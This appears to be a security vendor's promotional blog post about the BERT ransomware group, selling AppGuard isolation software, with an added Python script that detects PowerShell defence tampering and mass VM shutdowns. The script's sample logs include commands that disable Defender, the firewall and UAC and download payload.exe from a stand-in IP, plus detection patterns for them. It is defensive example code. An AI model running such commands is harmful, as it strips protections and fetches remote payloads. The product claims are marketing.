Prevent undetectable malware and 0-day exploits with AppGuard!

A Swift and Simple Threat: The Rise of BERT Ransomware

A newly surfaced, fast-moving ransomware group known as BERT—also tracked by Trend Micro as Water Pombero—is making waves across Asia, Europe, and the United States. Since its discovery in April 2025, this threat actor has targeted critical sectors such as healthcare, technology, and event services (sources: CSO Online, Trend Micro).

What makes BERT particularly dangerous is not its sophistication, but its speed, simplicity, and effectiveness.


How BERT Operates Across Platforms

On Windows

BERT’s Windows variant employs a straightforward codebase to match and kill processes essential to servers and databases. A PowerShell loader (start.ps1) carries out an alarming sequence of actions:

  • Escalates privileges

  • Disables Windows Defender, the firewall, and UAC

  • Downloads and executes payload.exe from a remote host (IP tied to Russian-registered ASN 39134)

Because the initial access vector remains unclear, the best defense is strong endpoint protection, admin controls, and proactive security measures.

On Linux and ESXi Systems

The Linux variant of BERT cranks up encryption speed using up to 50 concurrent threads, enabling rapid file encryption and minimizing detection windows. Even more troubling: BERT can forcibly shut down ESXi virtual machines, significantly complicating recovery.


Why Detection Alone Isn’t Enough

Experts warn this is a wake-up call. Despite its basic tools, BERT is highly effective at exploiting:

  • Weak passwords

  • Outdated endpoint protections

  • Excessive administrative access

  • Poor monitoring

  • Unsafe backups

Security professionals must be alert to suspicious PowerShell behavior—especially attempts to disable security tools or download remote payloads—and anomalous hypervisor activity like mass VM shutdowns.
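As an added illustration of the monitoring the paragraph above calls for (example code written for this article, not AppGuard's, CHIPS's or Trend Micro's code), the script below runs two simple detections over constructed log lines: it flags PowerShell script-block entries that tamper with Defender, the firewall or UAC, or that pull a payload from a remote URL (the behaviours listed in the Windows section), and it flags a burst of VM power-off events on a hypervisor of the kind described for ESXi. The log formats, host names, the 198.51.100.7 address, the regexes and the burst threshold are all assumptions made for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry). Two constructed line formats:
#   "<iso-ts> <host> PS4104 <script block text>"        PowerShell script-block log
#   "<iso-ts> <host> VMPOWEROFF user=<u> vm=<name>"     hypervisor power-off event
SAMPLE_LOGS = [
    "2025-04-10T09:00:01 WS01 PS4104 Set-MpPreference -DisableRealtimeMonitoring $true",
    "2025-04-10T09:00:02 WS01 PS4104 netsh advfirewall set allprofiles state off",
    "2025-04-10T09:00:03 WS01 PS4104 Set-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name EnableLUA -Value 0",
    "2025-04-10T09:00:04 WS01 PS4104 (New-Object Net.WebClient).DownloadFile('http://198.51.100.7/payload.exe','C:\\Users\\Public\\payload.exe')",
    "2025-04-10T09:05:00 WS02 PS4104 Get-ChildItem C:\\Logs | Measure-Object",
    "2025-04-10T09:10:00 esxi01 VMPOWEROFF user=root vm=db-01",
    "2025-04-10T09:10:05 esxi01 VMPOWEROFF user=root vm=db-02",
    "2025-04-10T09:10:10 esxi01 VMPOWEROFF user=root vm=app-01",
    "2025-04-10T09:10:15 esxi01 VMPOWEROFF user=root vm=app-02",
    "2025-04-10T09:10:20 esxi01 VMPOWEROFF user=root vm=file-01",
    "2025-04-10T09:10:25 esxi01 VMPOWEROFF user=root vm=file-02",
    "2025-04-10T08:00:00 esxi01 VMPOWEROFF user=admin vm=test-01",  # isolated, routine
    "2025-04-10T08:30:00 esxi01 VMPOWEROFF user=admin vm=test-02",
]

# Assumed indicator patterns for script-block content. A real deployment would
# tune these against a local baseline and add allow-lists for known update hosts.
POWERSHELL_RULES = {
    "defender_tamper": re.compile(r"Set-MpPreference\s+-Disable\w+", re.I),
    "firewall_tamper": re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I),
    "uac_tamper": re.compile(r"EnableLUA.*?\b0\b", re.I),
    "remote_download": re.compile(
        r"(DownloadString|DownloadFile|Invoke-WebRequest|iwr|Start-BitsTransfer)\b.*https?://", re.I),
}


def scan_powershell_events(lines):
    """Return (host, rule_name, snippet) for each script-block line matching a rule."""
    hits = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) < 4 or parts[2] != "PS4104":
            continue  # not a script-block record in the constructed format
        _ts, host, _, script = parts
        for name, rx in POWERSHELL_RULES.items():
            if rx.search(script):
                hits.append((host, name, script[:60]))
    return hits


def detect_vm_poweroff_burst(lines, threshold=5, window=timedelta(seconds=60)):
    """Return (host, user, peak_count) for any user who powers off at least
    `threshold` VMs inside any `window`-long interval (sliding window)."""
    events = defaultdict(list)
    for line in lines:
        m = re.match(r"(\S+) (\S+) VMPOWEROFF user=(\S+) vm=(\S+)$", line)
        if not m:
            continue
        events[(m.group(2), m.group(3))].append(datetime.fromisoformat(m.group(1)))
    alerts = []
    for (host, user), times in events.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1  # drop events that fell out of the window
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append((host, user, peak))
    return alerts


def run_detections(lines):
    """Bundle both detections so a caller gets one report per log batch."""
    return {
        "powershell": scan_powershell_events(lines),
        "vm_poweroff_bursts": detect_vm_poweroff_burst(lines),
    }


if __name__ == "__main__":
    for section, findings in run_detections(SAMPLE_LOGS).items():
        print(section)
        for f in findings:
            print("  ", f)
```

On the constructed sample the PowerShell scan fires four times for WS01 and never for WS02's benign listing, and the burst detector reports root's six power-offs within 25 seconds while ignoring admin's two isolated events; in practice the window and threshold should be set from the environment's normal maintenance pattern, and the remote-download rule needs an allow-list of legitimate update sources to stay quiet on routine traffic.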


The New Ransomware Landscape: Lean, Fast, Devastating

BERT is part of a broader trend: ransomware that is lighter, modular, and speed-optimized:

  • Gunra, which appends .encrt to encrypted files

  • Silent Ransom, which steals data before demanding ransom

  • Hybrid threats like Mamona, blending speed with stealth

These trends expose the limits of traditional AV, EDR, and perimeter-based tools. What’s needed now: containment-first strategies that limit blast radius and isolate threats quickly.


From “Detect and Respond” to “Isolation and Containment”: Enter AppGuard

We’ve seen what BERT and its peers can do. Now, it’s time to shift the security paradigm.

AppGuard, with its proven 10-year track record, delivers strong endpoint protection by isolating untrusted behaviors and processes before they can harm your system—not just detecting threats after they occur.

This approach enables businesses to:

  • Contain threats at first sight

  • Prevent privilege escalation and payload execution

  • Safeguard critical systems—even during rapid, concurrent attacks like those seen in Linux/ESXi environments

Stop playing the crazy game. Come over to the AppGuard way of doing things.


Your Next Step: Shield Your Business with AppGuard

Cyber threats like BERT prove that speed and simplicity can wreak havoc when defenses rely only on detection and response. It’s time to bolster your security posture with a strategy rooted in isolation and containment.

Business owners, talk with us at CHIPS today to discover how AppGuard can safeguard your endpoints from threats like BERT. Let’s move beyond reactive postures to proactive protection.


Why This Matters:

BERT’s rapid expansion and ability to disable defenses show that defense-in-depth is no longer optional—it’s urgent. If your protection strategy still leans heavily on “detect and respond,” it’s time to modernize. AppGuard’s isolation-first model offers the real-world resilience your business needs.
